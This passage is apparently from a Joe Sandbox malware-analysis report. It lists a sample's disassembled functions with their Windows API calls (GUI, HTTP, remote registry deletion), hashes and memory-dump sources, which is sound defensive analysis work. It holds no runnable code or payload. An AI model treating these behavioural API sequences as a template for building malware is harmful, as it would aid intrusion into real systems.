                                                                                                                                                                                                                                                                  • Instruction ID: 310b9d8900db4eb04b9d221bac64203cadf0324f91799761c657eb0f99336a5e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88d6b55d5e196fa5b260e16079d201e914eafd3bd2efdb9db952f4870b9e0cd1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49122F71A00215EFDB14DF94C884EAEBBB5FF45314F298098F949AB251D731ED46CBA0
                                                                                                                                                                                                                                                                  Function 00CE381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00DB29C0), ref: 00D23F72
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(00DB29C0), ref: 00D24022
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D24066
                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00D2406F
                                                                                                                                                                                                                                                                  • TrackPopupMenuEx.USER32(00DB29C0,00000000,?,00000000,00000000,00000000), ref: 00D24082
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D2408E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 067b71eb1ace0df60b8506d06aa965aa5694c357164dd401dd7f99bf1eca7ff3
                                                                                                                                                                                                                                                                  • Instruction ID: 5757557b0c12f7e4ad8efb3be69ba426bf2db1bf11467b7e1472b8b5f508813a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 067b71eb1ace0df60b8506d06aa965aa5694c357164dd401dd7f99bf1eca7ff3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA71F330604355BFEB219F29EC49FAABF75FF05368F144206F628A62E0C775A950DB60
                                                                                                                                                                                                                                                                  Function 00D77711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,?), ref: 00D77823
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D77897
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D778B9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D778CC
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D778ED
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00CE0000,00000000), ref: 00D7791C
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D77935
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D7794E
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D77955
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D7796D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D77985
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE2234: GetWindowLongW.USER32(?,000000EB), ref: 00CE2242
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                  • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                  • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                  • Opcode ID: 180c2cf6668b3fa942794cc5a9ca540163a2b823368436b12ea3370d4b76bdf3
                                                                                                                                                                                                                                                                  • Instruction ID: 2be324192d045a455c305b7a67659047f28e2bec3d236edc4cea75bd9033e9d5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 180c2cf6668b3fa942794cc5a9ca540163a2b823368436b12ea3370d4b76bdf3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE716A70144344AFD725CF18CC48FAABBF9EB89300F08491DF98987261E770A945DF21
                                                                                                                                                                                                                                                                  Function 00D79B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00D79BA3
                                                                                                                                                                                                                                                                    • Part of subcall function 00D780AE: ClientToScreen.USER32(?,?), ref: 00D780D4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D780AE: GetWindowRect.USER32(?,?), ref: 00D7814A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D780AE: PtInRect.USER32(?,?,?), ref: 00D7815A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00D79C0C
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D79C17
                                                                                                                                                                                                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D79C3A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D79C81
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00D79C9A
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00D79CB1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00D79CD3
                                                                                                                                                                                                                                                                  • DragFinish.SHELL32(?), ref: 00D79CDA
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00D79DCD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                  • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                  • Opcode ID: 61fef9512eb1847366668512ab3ca708e960db354f70e0cccb543e2049544793
                                                                                                                                                                                                                                                                  • Instruction ID: 0a77ad91bdf130b7184377e7eda8fb8b2a415c657fa20d6fc5c293025b0a6bea
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61fef9512eb1847366668512ab3ca708e960db354f70e0cccb543e2049544793
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF618B72108301AFC705EF50CC85DAFBBF9EF88750F40091DF59A922A1EB709A49DB62
                                                                                                                                                                                                                                                                  Function 00D5CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D5CEF5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D5CF08
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D5CF1C
                                                                                                                                                                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D5CF35
                                                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00D5CF78
                                                                                                                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D5CF8E
                                                                                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D5CF99
                                                                                                                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00D5CFC9
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00D5D021
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00D5D035
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00D5D040
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: 4a45e57f0c4ef6970e6fd413ee8be7ae14d4c8c4cd5d35694c8e62bbd763d738
                                                                                                                                                                                                                                                                  • Instruction ID: 0325ffddf4a42369eb9ccd9738da77740884046fe7cd533ef96c971a7d10085a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a45e57f0c4ef6970e6fd413ee8be7ae14d4c8c4cd5d35694c8e62bbd763d738
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B513AB1501704BFDB219F64CC88AAA7BBEFF48746F04441AFD4AD6250E734D949AB70
                                                                                                                                                                                                                                                                  Function 00D78FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00D766D6,?,?), ref: 00D78FEE
                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D78FFE
                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79009
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79016
                                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00D79024
                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79033
                                                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00D7903C
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79043
                                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D766D6,?,?,00000000,?), ref: 00D79054
                                                                                                                                                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D80C04,?), ref: 00D7906D
                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00D7907D
                                                                                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7909D
                                                                                                                                                                                                                                                                  • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00D790CD
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D790F5
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00D7910B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                  • Opcode ID: 78e2ae30ee4c7b420732fae1c089d5937b9213198e016e1a9fe85ba183cf1c86
                                                                                                                                                                                                                                                                  • Instruction ID: dd9391f6da7f636505185b7451cdc1ebdff890d5fa8a19f85f0db2163d116251
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78e2ae30ee4c7b420732fae1c089d5937b9213198e016e1a9fe85ba183cf1c86
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42410975600308AFDB119F65DC48EAABBB9EF89711F148059F909E7261E7709941DB30
                                                                                                                                                                                                                                                                  Function 00D6C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C154
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D6C1D2
                                                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?), ref: 00D6C26A
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6C2DE
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6C2FC
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D6C352
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D6C364
                                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D6C382
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00D6C3E3
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6C3F4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                  • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                  • Opcode ID: 24485ba67b7dc6fde436076810a7ce4ef8ec152612ab093f30bcddb0b535dd1c
                                                                                                                                                                                                                                                                  • Instruction ID: 54875c8e156111371df5048813621682b8e17c033dd6ef4ae87ddc56d36df966
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24485ba67b7dc6fde436076810a7ce4ef8ec152612ab093f30bcddb0b535dd1c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBC17A34214341AFD710DF65C494F2ABBE1BF89304F18959CE49A8B3A2CB75ED46CBA1
                                                                                                                                                                                                                                                                  Function 00D62FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D63035
                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00D63045
                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00D63051
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00D6305E
                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00D630CA
                                                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00D63109
                                                                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00D6312D
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00D63135
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00D6313E
                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00D63145
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00D63150
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                  • Opcode ID: c2407ffaf63f1f3ac42f22f232edd8aa5366a6ee3fa36fbc3885b4f7e4f3bdea
                                                                                                                                                                                                                                                                  • Instruction ID: cdfa7a541b428389af67658863bcd158486c21306b0907489946cca83f4f1ee6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2407ffaf63f1f3ac42f22f232edd8aa5366a6ee3fa36fbc3885b4f7e4f3bdea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2361B375D00319AFCF15CFA4D884EAEBBB6FF48310F208519E959A7250E775AA41CFA0
                                                                                                                                                                                                                                                                  Function 00D7A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00D7A990
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00D7A9A7
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D7A9B3
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 00D7A9C9
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00D7AC15
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D7AC33
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D7AC54
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000003,00000000), ref: 00D7AC73
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00D7AC95
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000005,?), ref: 00D7ACBB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 3962739598-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: ea23b1e46ee37fc0d220a8bdc3f7a7bb32cf950f5b29496b4acc71bdb14d7422
                                                                                                                                                                                                                                                                  • Instruction ID: 0164a39917740572bd4cba6e12751e94accea865e345788ed2bbba8232de1721
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea23b1e46ee37fc0d220a8bdc3f7a7bb32cf950f5b29496b4acc71bdb14d7422
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1B16835600219EFDF15CF6CC9857AE7BB2FF84704F18C069ED49AA295E770A980CB61
                                                                                                                                                                                                                                                                  Function 00D452AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00D452E6
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00D45328
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D45339
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00D45345
                                                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00D4537A
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00D453B2
